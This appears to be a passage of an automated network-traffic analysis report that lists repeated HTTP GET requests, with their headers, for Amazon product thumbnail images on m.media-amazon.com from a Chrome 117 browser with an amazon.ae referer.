Source: global trafficHTTP traffic detected: GET /images/I/71-uNsROuoL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71fUZu5nc0L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81Oo9KYmy3L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/51APRC2x3IL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81SRiWX-rcL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/51ytwQsTQJL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/410RBbkN1-L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71-ANz0gizL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71-zL81AiAL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71-uNsROuoL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71fUZu5nc0L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81Oo9KYmy3L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71H5TbZ9G6L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61czlYZjf2L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81B7s-7r48L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/410RBbkN1-L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71-zL81AiAL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71-ANz0gizL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/713WPUEZYDL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/51H4u4crV3L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61ZZd5V2wJL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61czlYZjf2L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71H5TbZ9G6L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71JdlF7JKIL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61za6jnk1GL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81B7s-7r48L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/51H4u4crV3L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/713WPUEZYDL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61ZZd5V2wJL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/91+aaxyLapL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71PpuvUNQ4L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71NAHqFhGML._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61zol3DlpeL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71JdlF7JKIL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61za6jnk1GL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81F8SVBsHYL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71KCNSueOqL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/91+aaxyLapL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61zol3DlpeL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71NAHqFhGML._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71PpuvUNQ4L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/916ke72wlWL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71JxdOlrA8L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61pYmhJ35NL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/51Y2nTHMPOL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81F8SVBsHYL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71KCNSueOqL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71c2DCsZCJS._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
